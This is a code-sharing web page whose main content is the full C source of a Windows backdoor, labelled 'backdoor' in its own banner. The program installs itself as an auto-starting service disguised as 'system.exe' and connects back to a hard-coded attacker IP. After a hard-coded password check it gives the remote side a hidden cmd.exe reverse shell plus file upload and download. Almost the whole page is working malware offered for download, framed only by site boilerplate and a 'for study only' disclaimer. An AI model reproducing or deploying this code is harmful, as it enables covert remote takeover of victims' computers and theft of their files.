实例介绍
【实例简介】
【实例截图】
【核心代码】
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
void WINAPI ServiceMain(DWORD,LPTSTR *);
DWORD WINAPI CmdService(LPVOID);
DWORD WINAPI CmdShell(LPVOID);
void WINAPI ServiceCtrlHandler(DWORD Opcode);
BOOL InstallCmdService();
void DelServices();
int door();
void Usage(void);
VOID WINAPI EXEBackMain (LPVOID s);
SERVICE_STATUS m_ServiceStatus;
SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
BOOL bRunning=true;
BOOL flag=true;
#define PASSSUCCESS "Password success!\n"
#define PASSERROR "Password error.\n"
#define BYEBYE "ByeBye!\n"
#define WSAerron WSAGetLastError()
#define erron GetLastError()
#define PORT 80 //远程的连接端口
#define DEST_IP_ADDR "192.168.181.128"//要连接的远程IP
int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{"system",ServiceMain},//服务程序的名称和入口点(函数)
{NULL ,NULL }//SERVICE_TABLE_ENTRY结构必须以“NULL”结束;
};
if(argc==1) door();
if(argc==2)
{
if(!stricmp(argv[1],"-i"))//如果第二个参数等于-install
{
InstallCmdService();
}
else if(!stricmp(argv[1],"-r"))//比较字符串s1和s2
{
DelServices();
}
else
{
Usage();
}
return 0;
}
StartServiceCtrlDispatcher(DispatchTable);//把入口点的地址传入
return 0;
}
int door ()
{
SOCKET sock=NULL;
struct sockaddr_in sai;
TCHAR UserPass[20]={0}; //用户设置密码缓冲
TCHAR PassBuf[20]={0}; //接收密码缓冲
TCHAR PassBanner[]="Password:";
TCHAR Banner[]="--------- backdoor---------\n";
sai.sin_family=AF_INET;
sai.sin_addr.s_addr=inet_addr(DEST_IP_ADDR);
sai.sin_port=htons(PORT);
//sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
while (TRUE)
{
WSADATA wsadata;
BOOL ThreadFlag=FALSE;
DWORD ThreadID=0;
int nRet=0;
nRet=WSAStartup(MAKEWORD(2,2),&wsadata); //初始化
if (nRet)
{
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock==INVALID_SOCKET)
{
goto Clean;
}
nRet=connect(sock,(struct sockaddr*)&sai,sizeof (struct sockaddr));
Sleep(3000);
if (nRet!=SOCKET_ERROR)
{
nRet=send(sock,Banner,sizeof (Banner),0);
while (TRUE)
{
nRet=send(sock,PassBanner,sizeof (PassBanner),0);
nRet=recv(sock,PassBuf,sizeof (PassBuf)-1,0);
if (strnicmp(PassBuf,"wangrun",strlen("wangrun"))==0)
{
send(sock,PASSSUCCESS,sizeof (PASSSUCCESS),0);
ThreadFlag=TRUE;
break;
}
if (nRet==SOCKET_ERROR)
{
goto Clean;
}
Sleep(100);
}
if (ThreadFlag)
{
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)EXEBackMain,(LPVOID)sock,0,&ThreadID);
while(flag) {}
flag=true;
}
}
Sleep(1000);
}
Clean:
if (sock!=NULL) closesocket(sock);
WSACleanup();
return 0;
}
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv)
//服务主函数
{
m_ServiceStatus.dwServiceType = SERVICE_WIN32;
m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwServiceSpecificExitCode = 0;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
m_ServiceStatusHandle = RegisterServiceCtrlHandler("system",ServiceCtrlHandler);
if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)return;
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
//设置服务状态
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
//SERVICE_STATUS结构含有七个成员,它们反映服务的现行状态。
//所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置
if( SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus))
bRunning=true;
door(); //启动服务程序
return;
}
void WINAPI ServiceCtrlHandler(DWORD Opcode)//服务控制函数
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE: // we accept the command to pause it
m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
bRunning=false;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
return;
}
BOOL InstallCmdService()//安装服务函数
{
char strDir[1024];
SC_HANDLE schSCManager,schService;
GetCurrentDirectory(1024,strDir);//取当前目录
GetModuleFileName(NULL,strDir,sizeof(strDir));
//取当前文件路径和文件名
char chSysPath[1024];
GetSystemDirectory(chSysPath,sizeof(chSysPath));//取系统目录
strcat(chSysPath,"\\system.exe");
//将scvhost.exe拼接到系统目录
if(CopyFile(strDir,chSysPath,FALSE))printf("Copy file OK\n");
// 把当前服务程序复制到系统根目录为system.exe
strcpy(strDir,chSysPath);
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL)
{
printf("open scmanger failed,maybe you do not have the privilage to do this\n");
return false;
}
LPCTSTR lpszBinaryPathName=strDir;
schService = CreateService(schSCManager,
"system",
"system", //将服务的信息添加到SCM的数据库
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_OWN_PROCESS, // service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
lpszBinaryPathName, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService)
printf("Install Service Success!\n");
else
return false;
CloseServiceHandle(schService);
return true;
}
void DelServices()
{
char name[100];
SC_HANDLE scm;
SC_HANDLE service;
SERVICE_STATUS status;
strcpy(name,"system");
if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL)
{
printf("OpenSCManager Error ");
}
service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE);
if (!service)
{
printf("OpenService error! ");
return;
}
BOOL isSuccess=QueryServiceStatus(service,&status);
if (!isSuccess)
{
printf("QueryServiceStatus error! ");
return;
}
if ( status.dwCurrentState!=SERVICE_STOPPED )
{
isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status);
if (!isSuccess )
printf("Stop Service error! ");
Sleep( 500 );
}
isSuccess=DeleteService(service);
if (!isSuccess)
printf("Delete Service Fail!");
else
printf("Delete Service Success! ");
CloseServiceHandle(service );
CloseServiceHandle(scm);
}
VOID WINAPI EXEBackMain (LPVOID s)
//BOOL EXEBackMain (SOCKET sock)
{
SOCKET sock=(SOCKET)s;
STARTUPINFO si;
PROCESS_INFORMATION pi;
HANDLE hRead=NULL,hWrite=NULL;
TCHAR CmdSign[]="\nwr:\\>";
while (TRUE)
{
TCHAR MsgError[50]={0}; //错误消息缓冲
TCHAR Cmdline[300]={0}; //命令行缓冲
TCHAR RecvBuf[1024]={0}; //接收缓冲
TCHAR SendBuf[2048]={0}; //发送缓冲
char *filename;
SECURITY_ATTRIBUTES sa;
DWORD bytesRead=0;
int ret=0,size,i;
FILE *fp;
sa.nLength=sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
//创建匿名管道
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
goto Clean;
}
si.cb=sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError=hWrite;
si.hStdOutput=hWrite; //进程(cmd)的输出写入管道
si.wShowWindow=SW_HIDE;
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
GetSystemDirectory(Cmdline,sizeof (Cmdline)); //获取系统目录
strcat(Cmdline,"\\cmd.exe /c "); //拼接cmd
/*ret=send(sock,CmdSign,sizeof (CmdSign),0); //向目标发送提示符
if (ret==SOCKET_ERROR)
{
goto Clean;
}*/
ret=recv(sock,RecvBuf,sizeof (RecvBuf),0);
//接收目标数据
//如果为exit或quit,就退出
if (strnicmp(RecvBuf,"exit",4)==0||strnicmp(RecvBuf,"quit",4)==0)
{
send(sock,BYEBYE,sizeof (BYEBYE),0);
goto Clean;
}
//upload
if (strnicmp(RecvBuf,"upload",6)==0)
{
filename=RecvBuf 7;
if((fp=fopen(filename,"wb"))==NULL)
{
printf("can't open file \n");
continue;
}
printf("%s is recving ...\n",filename);
recv(sock,(char *)&size,sizeof(size),0);
i=0;
while((ret=recv(sock,RecvBuf,sizeof (RecvBuf),0))>0)
{
i =ret;
fwrite(RecvBuf,ret,1,fp);
memset(RecvBuf,0,sizeof(RecvBuf));
if(i==size)
{
printf("transport successful!\n");
break;
}
}
fclose(fp);
}
//download
if (strnicmp(RecvBuf,"download",8)==0)
{
filename=RecvBuf 9;
if((fp=fopen(filename,"rb"))==NULL)
{
printf("can't open file \n");
continue;
}
printf("%s is sending ...\n",filename);
fseek(fp,0,SEEK_END);
size=ftell(fp);
fseek(fp,0,SEEK_SET);
send(sock,(char *)&size,sizeof(size),0);
while((ret=fread(SendBuf,1,1024,fp))>0)
{
send(sock,SendBuf,ret,0);
memset(SendBuf,0,sizeof(SendBuf));
}
fclose(fp);
printf("transport successful!\n");
}
//表示对方已经断开
if (ret==SOCKET_ERROR)
{
goto Clean;
}
//表示接收数据出错
if (ret<=0)
{
#ifdef DEBUGMSG
sprintf(MsgError,"recv() GetLastError reports %d\n",WSAerron);
send(sock,MsgError,sizeof (MsgError),0);
#endif
continue;
}
Sleep(100);
strncat(Cmdline,RecvBuf,sizeof (RecvBuf));
//拼接一条完整的cmd命令
//创建进程,也就是执行cmd命令
if (!CreateProcess(NULL,Cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
continue;
}
CloseHandle(hWrite);
while (TRUE)
{
//无限循环读取管道中的数据,直到管道中没有数据为止
if (ReadFile(hRead,SendBuf,sizeof (SendBuf),&bytesRead,NULL)==0)
break;
send(sock,SendBuf,bytesRead,0);
//发送出去
memset(SendBuf,0,sizeof (SendBuf));
//缓冲清零
Sleep(100);
}
}
Clean:
//释放句柄
if (hRead!=NULL)
CloseHandle(hRead);
if (hWrite!=NULL)
CloseHandle(hWrite);
//释放SOCKET
if (sock!=NULL)
closesocket(sock);
flag=false;
WSACleanup();
ExitThread(0);
//return 0;
}
void Usage()
{
fprintf(stderr,"Code by wangrun\n""Usage:%s [-i] [-r] -i: install service; -r: remove service.\n");
}
好例子网口号:伸出你的我的手 — 分享!
小贴士
感谢您为本站写下的评论,您的评论对其它用户来说具有重要的参考价值,所以请认真填写。
- 类似“顶”、“沙发”之类没有营养的文字,对勤劳贡献的楼主来说是令人沮丧的反馈信息。
- 相信您也不想看到一排文字/表情墙,所以请不要反馈意义不大的重复字符,也请尽量不要纯表情的回复。
- 提问之前请再仔细看一遍楼主的说明,或许是您遗漏了。
- 请勿到处挖坑绊人、招贴广告。既占空间让人厌烦,又没人会搭理,于人于己都无利。
关于好例子网
本站旨在为广大IT学习爱好者提供一个非营利性互相学习交流分享平台。本站所有资源都可以被免费获取学习研究。本站资源来自网友分享,对搜索内容的合法性不具有预见性、识别性、控制性,仅供学习研究,请务必在下载后24小时内给予删除,不得用于其他任何用途,否则后果自负。基于互联网的特殊性,平台无法对用户传输的作品、信息、内容的权属或合法性、安全性、合规性、真实性、科学性、完整权、有效性等进行实质审查;无论平台是否已进行审查,用户均应自行承担因其传输的作品、信息、内容而可能或已经产生的侵权或权属纠纷等法律责任。本站所有资源不代表本站的观点或立场,基于网友分享,根据中国法律《信息网络传播权保护条例》第二十二与二十三条之规定,若资源存在侵权或相关问题请联系本站客服人员,点此联系我们。关于更多版权及免责申明参见 版权及免责申明
网友评论
我要评论